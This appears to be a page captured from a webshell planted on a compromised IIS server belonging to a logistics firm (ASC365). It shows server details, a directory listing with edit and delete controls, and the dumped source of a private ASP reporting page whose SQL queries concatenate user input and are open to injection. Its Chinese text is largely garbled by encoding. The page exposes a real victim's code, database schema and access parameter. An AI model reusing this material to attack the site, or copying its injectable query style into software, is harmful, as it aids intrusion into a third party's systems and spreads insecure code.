Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <%Response.Charset="gb2312"%> <!--#include file="include/conn.asp" --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <meta name="robots" content="noindex,nofollow"> <script type="text/javascript" src="js/echarts.min.js" charset="utf-8"></script> <script type="text/javascript" src="http://code.jquery.com/jquery-1.12.2.js"></script> <title>ASC���ʹ�˾</title> <style> table{ border: solid 1px #000000; } table tr td{ border-Bottom: dotted 1px #000000; border-top: dotted 1px #000000; border-right: dotted 1px #000000; border-left-width:1px; border-left-color:#000000; } .box{ border-left-width:3px; border-left-color:#FF0000; border-Bottom: dotted 1px #000000; border-top: dotted 1px #000000; border-right: dotted 1px #000000; } </style> </head> <body style="text-align:center; margin:0 auto;"> <% flgRead = Request.Querystring("arg") if flgRead <> "Asc365New" then response.end arg1 = Request.Querystring("prdcode") yy = year(date())*1 - 1 fromdate = yy &"/01/01" todate = DateAdd("d",-1,date()) s1 = "ALL" curck = "ALL" if request.Form("submit")="submit" then fromdate = request.Form("fromdate") todate = request.Form("todate") if datediff("d",fromdate,"2016-06-26") >0 then fromdate = "2016-06-26" if datediff("d",todate,DateAdd("d",-1,date())) <0 then todate = DateAdd("d",-1,date()) s1 = request.Form("jkbgf") curck = request.Form("ck") end if dim ck(100,2) ck(0,0) = "ALL" ck(0,1) = "ALL" id_ck = 1 sql = "Select STORCODE,STORNAME from BA_STORDF where STORCODE not like 'Y%'order by CHARINDEX(STORCODE ,'DLD|JJS|JS2|LSJ|TP2|TPP|JSH|NYF|F01|F07|F02|F03|F04|F06|FBA|F05|EFB|WJS|WLS|WTP')" set rsck = server.CreateObject("adodb.recordset") rsck.open sql,conn,1,1 do while not rsck.eof ck(id_ck,0) = rsck(0) ck(id_ck,1) = rsck(1) id_ck = id_ck + 1 rsck.movenext loop rsck.close set rsck = nothing ck(id_ck,0) = "FBA�ֿ�" ck(id_ck,1) = "FBA�ֿ�" id_ck = id_ck + 1 sql = "select CAST(yy as varchar) + '-'+ right('0' +CAST(mm as varchar),2),SUM(����),SUM(��˰),SUM(���˷�),sum(bulkbym) as bulkbym from(select YEAR(dt) as yy,MONTH(dt) as mm,coalesce(����,0) as ����,coalesce(��˰,0) as ��˰,coalesce(���˷�,0) as ���˷�,coalesce(bulkbym,0) as bulkbym from (select dateadd(d,number,'" & fromdate & "') as dt from master.dbo.spt_values where type ='P' and number <=DATEDIFF(DAY, '" & fromdate & "', '" & todate & "')) a left join (select OPDTIN1 as �����������,sum(cast(checkfee1/dbo.GetHuilvtoUSD(OPDTOUT2,'CNY')+checkfee2 as decimal(15,2))) as ����,sum(cast(normaltax + addtax +(tariffca + gstcca)/dbo.GetHuilvtoUSD(OPDTIN1,'CAD') as decimal(15,2))) as ��˰,sum(totalamt9) as ���˷�,sum(bulkbym) as bulkbym from TR_SEAINTRANSITMSG2 a where FLGIN = '1' and OPDTIN1 between '" & fromdate & "' and '" & todate & "' " if s1 <> "ALL" then sql = sql & "and IMPORTERCUSTM='" & s1 & "'" if curck <> "ALL" then if curck = "FBA�ֿ�" then sql = sql & " and INSTORCODE in (select storcode from ba_stordf where storcode like 'F%')" else sql = sql & " and INSTORCODE = '" & curck & "'" end if end if sql = sql & " group by OPDTIN1 ) b on a.dt = b.�����������) aa group by yy,mm order by yy,mm" set rs=server.CreateObject("adodb.recordset") rs.open sql,conn,1,1 datedt = "[" jianchafee = "[" guanshui = "[" haiyunfee = "[" tiji = "[" 'allfee = "[" do while not rs.eof datedt = datedt & "'" & rs(0) & "'," jianchafee = jianchafee & "'" & rs(1) & "'," guanshui = guanshui & "'" & rs(2) & "'," haiyunfee = haiyunfee & "'" & rs(3) & "'," tiji = tiji & "'" & rs(4) & "'," ' allfee = allfee & "'" & FormatNumber(round(rs(1),2)*1+round(rs(2),2) *1 + round(rs(3),2)*1,2,-1,0,0) & "'," rs.movenext loop rs.close set rs = nothing datedt = left(datedt,len(datedt) -1) & "]" jianchafee = left(jianchafee,len(jianchafee) -1) & "]" guanshui = left(guanshui,len(guanshui) -1) & "]" haiyunfee = left(haiyunfee,len(haiyunfee) -1) & "]" tiji = left(tiji,len(tiji) -1) & "]" 'allfee = left(allfee,len(allfee) -1) & "]" conn.close set conn = nothing sfromdate = "'" & fromdate & "'" stodate = "'" & todate & "'" %> <div style="margin:0 auto; text-align:center"> <form method="post" action="" align="center" name="prdmsg"> <table width="800" border="1" style="border-collapse: collapse" align="center"> <tr> <td nowrap>����������ڴӣ�<input type="text" name="fromdate" value="<%=fromdate%>"></td> <td nowrap>����<input type="text" name="todate" value="<%=todate%>"></td> <td nowrap>�����ջ��ֿ� <select name="ck"> <%for i=0 to id_ck -1%> <option value="<%=ck(i,0)%>" <%if curck=ck(i,0) then%> selected <%end if%>><%=ck(i,1)%></option> <%next%> </select> </td> <td nowrap>���ڱ��ط��� <select name="jkbgf"> <option value="ALL" <%if s1="ALL" then%> selected <%end if%>>ALL</option> <option value="���˾" <%if s1="���˾" then%> selected <%end if%>>���˾</option> <option value="��ɼ���˾_Topseller" <%if s1="��ɼ���˾_Topseller" then%> selected <%end if%>>��ɼ���˾_Topseller</option> <option value="�ɽ�ɽ��˾" <%if s1="�ɽ�ɽ��˾" then%> selected <%end if%>>�ɽ�ɽ��˾</option> <option value="̹����˾" <%if s1="̹����˾" then%> selected <%end if%>>̹����˾</option> <option value="���ô�FBA" <%if s1="���ô�FBA" then%> selected <%end if%>>���ô�FBA</option> <option value="����FBA" <%if s1="����FBA" then%> selected <%end if%>>����FBA</option> <option value="�ձ�FBA" <%if s1="�ձ�FBA" then%> selected <%end if%>>�ձ�FBA</option> <option value="����" <%if s1="����" then%> selected <%end if%>>����</option> </select> </td> <td nowrap><input type="submit" name="submit" value="submit"></td> </tr> </table> </form> </div> <div id="containerkc" style="text-align:center; height:93%" >Loading...</div> </div> </body> </html> <script type="text/javascript"> var dataX = <%=datedt%>; var dom3 = document.getElementById("containerkc"); var myChart3 = echarts.init(dom3); var app = {}; option3 = null; option3 = { title: { text: '��������ڷ����ܼƻ���', left:'center' }, tooltip: { trigger: 'axis', axisPointer : { // ������ָʾ���������ᴥ����Ч type : 'shadow' // Ĭ��Ϊֱ�ߣ���ѡΪ��'line' | 'shadow' } }, legend: { data:['����','��˰','�ܷ���','���'], left:'center', top:'5%' }, grid: { top: '15%', left: '3%', right: '4%', bottom: '5%', containLabel: true }, toolbox: { feature: { dataView : {show: true, readOnly: false,title:'�鿴����'}, saveAsImage: { title: '����ΪͼƬ' } } }, xAxis: { name: '����', type: 'category', data: dataX }, yAxis: [ { name: '���$', type: 'value', scale:'true', nameTextStyle:{ fontSize:'15' } }, { name: '���m3', type: 'value', scale:'true', nameTextStyle:{ fontSize:'15' } } ], dataZoom:[{ startValue: dataX[0] },{ type: 'inside' }], series: [ { name:'����', type:'bar', stack:'fee1', data:<%=jianchafee%>, itemStyle:{ normal:{ color:'#ffcccc' } }, barWidth: 20 }, { name:'��˰', type:'bar', stack:'fee2', data:<%=guanshui%>, itemStyle:{ normal:{ color:'#ff9999' } }, barWidth: 20 }, { name:'�ܷ���', type:'line', stack:'fee3', data:<%=haiyunfee%>, itemStyle:{ normal:{ color:'#ff6666' } }, barWidth: 20 }, { name:'���', type:'bar', stack:'fee4', yAxisIndex: 1, data:<%=tiji%>, itemStyle:{ normal:{ color:'#92d050' } }, barWidth: 20 }, ] }; ; if (option3 && typeof option3 === "object") { myChart3.setOption(option3, true); } </script>